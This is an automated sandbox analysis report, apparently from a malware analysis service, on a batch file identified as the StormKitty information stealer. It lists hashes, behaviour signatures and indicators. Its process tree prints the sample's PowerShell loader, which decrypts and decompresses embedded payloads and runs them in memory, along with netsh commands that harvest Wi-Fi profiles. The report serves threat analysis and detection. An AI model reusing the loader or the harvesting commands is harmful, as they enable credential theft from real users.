Analysis
-
max time kernel
13s -
max time network
15s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
06-08-2024 01:25
Static task
static1
Behavioral task
behavioral1
Sample
HDXD.bat
Resource
win10v2004-20240802-en
General
-
Target
HDXD.bat
-
Size
459KB
-
MD5
67c599f4ef16bb980d3ae40f2157ba29
-
SHA1
7e13072cacb4b77cb0d2afa222f6ce9005817fa3
-
SHA256
7ad43ccea385b16870b9e2e10d2d25e06149c11e034f9c32ad9e8f538f0c7e6d
-
SHA512
fd62651f81686d0548b3ec838da05b050cab0ab4f73d27f8c23cba2ae24f7d66b36ca82e130542a5fb0ce981095047565c4d8bd1d54e957ad058432ef7ab8335
-
SSDEEP
3072:G6QtAhoJ6Qn7NzvFuJJnoxEzr60Rj2rsrnmpVYtL9pr6T/Ikwu:G6QmhS6Qn7NRyJEErb2rsriube/ITu
Malware Config
Signatures
-
StormKitty
StormKitty is an open source info stealer written in C#.
-
StormKitty payload 1 IoCs
resource yara_rule behavioral1/memory/552-18-0x0000027EF9160000-0x0000027EF9190000-memory.dmp family_stormkitty -
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Blocklisted process makes network request 2 IoCs
flow pid Process 19 552 powershell.exe 22 552 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 552 powershell.exe -
Drops desktop.ini file(s) 6 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\fdb0b1a7e115d62cb22424c41468ace6\Admin@HVDPCYGS_en-US\Grabber\DRIVE-C\Users\Admin\Desktop\desktop.ini powershell.exe File created C:\Users\Admin\AppData\Local\fdb0b1a7e115d62cb22424c41468ace6\Admin@HVDPCYGS_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\desktop.ini powershell.exe File created C:\Users\Admin\AppData\Local\fdb0b1a7e115d62cb22424c41468ace6\Admin@HVDPCYGS_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\Camera Roll\desktop.ini powershell.exe File created C:\Users\Admin\AppData\Local\fdb0b1a7e115d62cb22424c41468ace6\Admin@HVDPCYGS_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\Saved Pictures\desktop.ini powershell.exe File created C:\Users\Admin\AppData\Local\fdb0b1a7e115d62cb22424c41468ace6\Admin@HVDPCYGS_en-US\Grabber\DRIVE-C\Users\Admin\Documents\desktop.ini powershell.exe File created C:\Users\Admin\AppData\Local\fdb0b1a7e115d62cb22424c41468ace6\Admin@HVDPCYGS_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\desktop.ini powershell.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 18 icanhazip.com -
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 4912 cmd.exe 2384 netsh.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 powershell.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier powershell.exe -
Suspicious behavior: EnumeratesProcesses 25 IoCs
pid Process 552 powershell.exe 552 powershell.exe 552 powershell.exe 552 powershell.exe 552 powershell.exe 552 powershell.exe 552 powershell.exe 552 powershell.exe 552 powershell.exe 552 powershell.exe 552 powershell.exe 552 powershell.exe 552 powershell.exe 552 powershell.exe 552 powershell.exe 552 powershell.exe 552 powershell.exe 552 powershell.exe 552 powershell.exe 552 powershell.exe 552 powershell.exe 552 powershell.exe 552 powershell.exe 552 powershell.exe 552 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 552 powershell.exe -
Suspicious use of WriteProcessMemory 18 IoCs
description pid Process procid_target PID 3588 wrote to memory of 4084 3588 cmd.exe 88 PID 3588 wrote to memory of 4084 3588 cmd.exe 88 PID 3588 wrote to memory of 552 3588 cmd.exe 89 PID 3588 wrote to memory of 552 3588 cmd.exe 89 PID 552 wrote to memory of 4912 552 powershell.exe 91 PID 552 wrote to memory of 4912 552 powershell.exe 91 PID 4912 wrote to memory of 1192 4912 cmd.exe 93 PID 4912 wrote to memory of 1192 4912 cmd.exe 93 PID 4912 wrote to memory of 2384 4912 cmd.exe 94 PID 4912 wrote to memory of 2384 4912 cmd.exe 94 PID 4912 wrote to memory of 1548 4912 cmd.exe 95 PID 4912 wrote to memory of 1548 4912 cmd.exe 95 PID 552 wrote to memory of 4260 552 powershell.exe 96 PID 552 wrote to memory of 4260 552 powershell.exe 96 PID 4260 wrote to memory of 2964 4260 cmd.exe 98 PID 4260 wrote to memory of 2964 4260 cmd.exe 98 PID 4260 wrote to memory of 1948 4260 cmd.exe 99 PID 4260 wrote to memory of 1948 4260 cmd.exe 99
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\HDXD.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:3588 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BucLyXWC3eBPqTlqwBWHaqzBdp5YMwvtNV97mopMNXY='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('d5Q/MR8+bAZNYeBhtEHKvg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $TfkLg=New-Object System.IO.MemoryStream(,$param_var); $aeXst=New-Object System.IO.MemoryStream; $GqJcD=New-Object System.IO.Compression.GZipStream($TfkLg, [IO.Compression.CompressionMode]::Decompress); $GqJcD.CopyTo($aeXst); $GqJcD.Dispose(); $TfkLg.Dispose(); $aeXst.Dispose(); $aeXst.ToArray();}function execute_function($param_var,$param2_var){ $fbLIA=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $zBkUe=$fbLIA.EntryPoint; $zBkUe.Invoke($null, $param2_var);}$uNtbl = 'C:\Users\Admin\AppData\Local\Temp\HDXD.bat';$host.UI.RawUI.WindowTitle = $uNtbl;$BPGsv=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($uNtbl).Split([Environment]::NewLine);foreach ($YerDV in $BPGsv) { if ($YerDV.StartsWith('FaEXnaAGZSiWPizwrJnJ')) { $OpSDM=$YerDV.Substring(20); break; }}$payloads_var=[string[]]$OpSDM.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "2⤵PID:4084
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops desktop.ini file(s)
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:552 -
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All3⤵
- System Network Configuration Discovery: Wi-Fi Discovery
- Suspicious use of WriteProcessMemory
PID:4912 -
C:\Windows\system32\chcp.comchcp 650014⤵PID:1192
-
-
C:\Windows\system32\netsh.exenetsh wlan show profile4⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:2384
-
-
C:\Windows\system32\findstr.exefindstr All4⤵PID:1548
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid3⤵
- Suspicious use of WriteProcessMemory
PID:4260 -
C:\Windows\system32\chcp.comchcp 650014⤵PID:2964
-
-
C:\Windows\system32\netsh.exenetsh wlan show networks mode=bssid4⤵
- Event Triggered Execution: Netsh Helper DLL
PID:1948
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\fdb0b1a7e115d62cb22424c41468ace6\Admin@HVDPCYGS_en-US\Browsers\Firefox\Bookmarks.txt
Filesize105B
MD52e9d094dda5cdc3ce6519f75943a4ff4
SHA15d989b4ac8b699781681fe75ed9ef98191a5096c
SHA256c84c98bbf5e0ef9c8d0708b5d60c5bb656b7d6be5135d7f7a8d25557e08cf142
SHA512d1f7eed00959e902bdb2125b91721460d3ff99f3bdfc1f2a343d4f58e8d4e5e5a06c0c6cdc0379211c94510f7c00d7a8b34fa7d0ca0c3d54cbbe878f1e9812b7
-
C:\Users\Admin\AppData\Local\fdb0b1a7e115d62cb22424c41468ace6\Admin@HVDPCYGS_en-US\System\Process.txt
Filesize2KB
MD52ccb86fb2f7559b5641eaf833bf213ed
SHA1ccfc4bf209faee31804e1851d07001d363bdaa14
SHA256a4754cf798f3b508cc949e01fb3aa8feedbd74c37fbe0735827f8e3dc4ddca2d
SHA5127b6ea6388411616cff9983e7218ef3a1f35916f0033dbae947d1117a9e89fa9c9015911956dc6b9f4081b8988c76c507432f31079e3cd22cb7a8563ebb46383c
-
C:\Users\Admin\AppData\Local\fdb0b1a7e115d62cb22424c41468ace6\Admin@HVDPCYGS_en-US\System\Process.txt
Filesize3KB
MD523165335b95257d7a7427861a694e131
SHA17bc28643569c7fadb5dacadbec3a4f95f8089c82
SHA256ee87408ef3aeb403a215ec9de3d051a831ebf5673fd49a7df114de14333ae800
SHA512f6a3bec7b2d316537a8bccac09e9637160633e9ef739b3be5a70ea40743b1a5e40af58e6d72b6fc4a2e5fbf9579f96b1309ca6f417b7cff57697779aeb8ebb4c
-
C:\Users\Admin\AppData\Local\fdb0b1a7e115d62cb22424c41468ace6\Admin@HVDPCYGS_en-US\System\Process.txt
Filesize3KB
MD55d9ac737555e253a8ed312384f0d5c1d
SHA1b28c5fab064cae30b05901e0acf0bd0304ae3e4f
SHA25685fa5dd2af0967150540ff8400fb0762bff9fa3d6b259f503270b206c083fabb
SHA5123a333e48db8c44448e984ecaa66cd90d9bf09e41672ffa61f8d6092fcb8da26e40539fbdfed2d0837d378fa46a75274ba531cb5d63154c6c4f4bd651a275f12b
-
C:\Users\Admin\AppData\Local\fdb0b1a7e115d62cb22424c41468ace6\Admin@HVDPCYGS_en-US\System\Process.txt
Filesize4KB
MD59a8c3ed5733f085041035022970d857b
SHA1391ee81646c6441a83e6b863a88ccf1637275f30
SHA256109a0824a1b0b93c35657ebd1a68cec4458f675000115fe5659936437390bea1
SHA5128ca8dec696a1320ec9a1f092be30748af1685d5322753f9935c5171303f898c9ab27c1a97b6dbf0633676b04feaa7448b3afaf1edcfef9f7047e3919751195d8
-
C:\Users\Admin\AppData\Local\fdb0b1a7e115d62cb22424c41468ace6\Admin@HVDPCYGS_en-US\System\Process.txt
Filesize1KB
MD59e516f53336cea4d586ae3d7335b9432
SHA1b0d6950342e36aa0c716be14b7ee2bb92c5d6909
SHA256f933287042f918cedf919e66349fbe1f278cd9b5a050d171d95b2f209e18d57d
SHA512892cf2a25926739fc4ad5334c8e50325e5c5ce028b362cc96d4898fcb4b194dddae2af18dac9466f594477510831b1afffbeb9a815cf4d1a289538472835556d